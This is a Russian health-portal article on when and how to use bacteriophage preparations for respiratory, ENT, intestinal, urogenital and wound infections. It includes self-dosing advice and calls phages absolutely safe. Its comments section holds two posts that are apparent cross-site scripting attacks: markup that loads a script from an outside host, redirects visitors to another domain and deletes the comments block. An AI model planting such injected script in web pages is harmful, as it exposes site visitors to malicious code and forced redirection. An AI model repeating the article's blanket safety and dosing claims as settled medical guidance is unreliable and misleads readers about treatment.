Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нужны ли бактериофаги име...  >>  Нужны ли бактериофаги именно вам?
 
Обратная связь
 

Нужны ли бактериофаги именно вам?

Размер шрифта
31 января 2014 00:00
  • google_analytics: false
  • Нравится

В предыдущих материалах этого спецпроекта мы подробно осветили, что такое бактериофаг и чем он отличается от антибиотиков. В каких же ситуациях есть смысл применять препараты фагов? Что ж, давайте вооружаться практическим знанием.

Нужны ли бактериофаги именно вам?

Начнем с того, что выделим главную мысль: в принципе, бактериофаг-содержащий препарат должен быть в вашей домашней аптечке, потому что, во-первых, он абсолютно безопасен для здоровья (фаги практически лишены побочных эффектов и токсичности), а во-вторых, срок годности таких препаратов достаточно велик.

Итак, как узнать, что пора бросить наше секретное оружие в атаку? И как именно им пользоваться?

При респираторных инфекциях

Кашель, чихание, повышение температуры, слабость – все это симптомы острой респираторной вирусной инфекции. Бактериофаг неэффективен против вирусов, однако именно в этот момент его применение наиболее целесообразно, потому что позволит снизить вероятность развития вторичных бактериальных осложнений. Ведь, по сути, нас пугает не сама простуда как таковая, а бактериальная флора, которая может вызвать осложнения на воспаленных и ослабленных дыхательных путях.

В этом случае нужно осуществлять промывание носа, ротовой полости и горла раствором бактериофага.

При инфекциях ЛОР-органов

К ним относятся отиты, фарингиты, синуситы. По сути, органы уха-горла-носа находятся в тесной неотъемлемой связи с дыхательной системой, поэтому ОРВИ почти всегда затрагивает и то, и другое. Боль в горле или ухе, осиплость, скрежетание за грудиной – всем знакомые симптомы.

Рекомендация в этом случае аналогичная – промывайте нос и горло раствором бактериофага. В случае серьезных ЛОР-заболеваний (к коим можно отнести, например, гайморит) врач может вводить препарат прямо внутрь пазухи.

При кишечных инфекциях

Рвота, диарея, метеоризм, повышение температуры – симптомы инфекционного процесса в пищеварительном тракте, который может протекать в форме гастроэнтерита, энтероколита и так далее. Кишечные инфекции могут вызываться вирусами, изолированными токсинами и бактериями, и в последнем случае препараты на основе фагов будут весьма кстати. В этом случае их нужно принимать перорально (то есть через рот) в жидкой форме по 5–20 миллилитров 3 раза в день в течение 10-15 дней.

При урологических и гинекологических инфекциях

Едва ли есть на свете хоть одна женщина, которая не постигла все прелести цистита? И это заболевание мочеполовой системы является далеко не единственным. Инфекционный процесс может локализоваться в любом ее сегменте: в уретре, во влагалище, по ходу мочеточников и так далее. Как правило, таким инфекциям сопутствуют так называемые дизурические явления: боль или жжение во время мочеиспускания, повышение его частоты и тому подобные. При поражении половых путей может отмечаться зуд и неприятно пахнущие выделения.

Поскольку в подавляющем большинстве случае инфекции мочеполовой системы вызываются бактериями, препараты на основе фагов будут весьма кстати. В этом случае их также принимают внутрь (в первую очередь при пиелонефрите), а также местно или интравагинально.

При раневой инфекции

Даже самая простецкая ссадина при бактериальной контаминации может стать проблемой. Именно поэтому обработка ран фагами является отнюдь небесполезным мероприятием. В этом случае накладывают примочки или тампоны, смоченные раствором бактериофага, а также орошают раневую поверхность. Если вы перед этим нанесли на рану химический антисептик (например, перекись водорода), крайне важно тщательно смыть его, потому что эти вещества разрушают как бактерий, так и фагов, снижая эффективность последних.

Внимание!

При появлении признаков серьезной инфекции (устойчивая фебрильная лихорадка, обильное гнойное отделяемое и так далее) обязательно обратитесь к врачу!

Ознакомьтесь с другими интересными материалами про бактериофаги на страницах нашего специального проекта «Жизнь без антибиотиков».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что лечат бактериофаги   Принюхайтесь к соседу! Запах человека говорит о его болезнях!   Душевые головки убивают людей! Что делать?   Как выбрать лекарство против грибка стопы?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Все о бронхите
Нежданно-негаданно! Почему болит голова?!
Перец не даст вас отравить

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.